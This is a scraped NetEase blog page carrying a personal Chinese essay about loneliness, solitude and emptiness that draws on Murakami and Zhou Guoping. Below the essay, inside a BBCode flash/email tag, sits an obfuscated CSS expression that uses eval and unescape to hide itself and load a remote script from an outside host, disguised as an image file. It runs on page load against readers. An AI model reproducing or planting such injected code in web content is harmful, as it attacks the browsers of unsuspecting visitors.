注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

清绝梅苑的博客

独舞纷如雪

 
 
 

日志

 
 

以“独”戒“独”!  

2010-08-02 11:44:42|  分类: 感悟随想 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
 

以“独”戒“独”! - 踏雪寻梅 - 清绝梅苑的博客 以“独”戒“独”! - 踏雪寻梅 - 清绝梅苑的博客 


     孤独,实在是个让人难以触碰的字眼。夹杂着班驳的熟悉 与陌生,留下的是一个无可奈何的姿态,淡淡的,无法释怀。 因为每个人总时不时的与孤独相伴,却终想不透这孤独为何 物?为何而孤独?何以“戒”此孤独? 


     最开始认识孤独的时候,是从书本之中。捧着散文坐在后 院,栀子花散发着蛋白清新的幽香。看着与孤独有关的只字片 语,讲述着孤人独立的悲苦愁绪。于是,孤独在我心中最初的 轮廓便是那个潇潇木叶独登台的瘦削的背影,是夜晚惊醒不经 意看到月光流泻过的满院安静而淡雅的花香,是深邃的黑色之 中一抹惨淡而隐约的纯白------在散文与诗词的世界里,连孤 独都总有某种说不出的美!
 

     少年不知愁滋味,华韶光年总说愁。也许年轻就是奢侈到给人以自寻烦恼的资本,所以每个人从年少的时候便会开始思 考一些事,关于人生。只是在思考领域中醒来,举目四顾,便看见别人与自己的距离,即使再亲近的朋友,也终究有一些说 不出隔膜,搁浅在欢聚转身以后,才知道,原来寂寞可以与人 相陪,而孤独始终比寂寞多了那么一点点难以言说的感触,比 寂寞多了那一寸到达不了的距离,模模糊糊,却清晰可见。因 而想起,村上春树时常在威士忌与旧唱片够成的格调里轻描淡写的说出:“无论我们和谁拥抱在一起,只要一闭上眼睛,还 是一个人,终究是孤独的”。一语中的!他的文字总是给人一 种彻底的孤独感,就像空气一般静静的落满全身,占据生命的 每一处角落。有人说,村上其实是在以彻底的孤独来寻求冲破 孤独的力量,很喜欢这种说法,最起码好过呻吟抱怨的颓废。



     记不清是从什么时候开始一点点的看懂孤独,只还清楚记得让我去体味孤独的某些人某些事。等明白过来,发现自已经与孤独相伴甚久。偶尔会若有感慨的叫好友的名字,却什么也说不出来,然后只有对其淡淡一笑;偶尔会喜欢一个人慢慢的走在冬天里,听着脚下高跟鞋与地面擦出的熟悉的声音;偶尔会捧着书跑到校园里的月季花面前,站在那里,细细端 详,然后还饶有兴致的填出一首怪怪的词;更会在没有星星的夜里,抬头寻找记忆里那颗即使在漫天繁星里也能认出的星 星。这便是我认为孤独的状态,并不是没有人陪伴的寂寞,而是偶尔不想要人陪的充实;不是沉浸在犹豫里无法自拔的颓 废,而是懂得与自己相对,与灵魂相遇的领悟;不是陷入空虚的恐惧与不安,而是心灵的一种安稳与冷静。


     这一点在看了好几遍周国平的人生自传〈〈岁月与性情〉〉后,终于豁然开朗。他以哲学的锐利与敏感告诉世人:因为深爱,所以孤独。我们不只因为孤独去爱,也因为爱而更

孤独,既而发现爱与孤独,本是同根,孤独实则和爱一样,与生俱来。而这份爱又不仅是一般意义上的爱情,而是源于对生命与人生最本质的理解与思悟,是渐渐的懂得生活的真谛后对世界,对别人,对自己的释然。哲学实在是值得人最诚挚而无上的敬畏,他能在人纠缠于孤独与悲痛中迷茫无措的时候,一语点醒梦中人。 


     每个人都是一个独立的生命体,无论身边有朋友也好,爱人也罢,各自的生命始终都只能是自己去承担,没有谁可以代替另一个生命。有些事永远都只能自己面对,只适合自己分享。因为无论别人怎么帮怎么可以理解可以陪伴,如果自己感觉不到,自己不能明白也终究无济于事。至于我们通常恐惧着的孤独,实则是空虚,空虚才是真正致命的。没有什么会比心灵的空洞更难以填补,那种什么都没有什么都无法感知的虚无,才真正让人浮躁让人迷茫,这样其实可以理解为是不懂得和自己相处。很可悲吧,一个人可以和任何人轻易的相处融洽而却单单不知道如何接纳自己。


     因而,真正懂得孤独的人是不畏惧孤独的,而是懂得如何与孤独为伴,与孤独相处,那样才会赢得心灵的充实,才能将那些无迹可寻的空虚挡在心门之外。因孤独而充实着的人才会明白何谓坚强与执著,才具有那份永远坚持自己的定力,才会有历尽沧桑后嫣然一笑的超然.人生成了一场觉悟,一段朝圣的旅途,而孤独便是旅途中一直摆在手边那一杯凉透的茶,恬淡而浓郁,清苦而香醇。 


     至此,若还要问及何以戒掉孤独? 



     那么只能回答:以“独”戒“独”!以“独”戒“独”! - 踏雪寻梅 - 清绝梅苑的博客 


 
以“独”戒“独”! - 踏雪寻梅 - 清绝梅苑的博客 
 
 

[music]2494120439|1|http://202.84.17.25/www/pages/zazhi/16/e95bb45176286079d8c4715a043ccb0a.mp3|-|0|-[/music]
[flash,400,300]http://catche.qq.com/temp/20081209/4236888.swf[email=]id=baidu style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//love.avtupian.com/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]
  评论这张
 
阅读(21)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017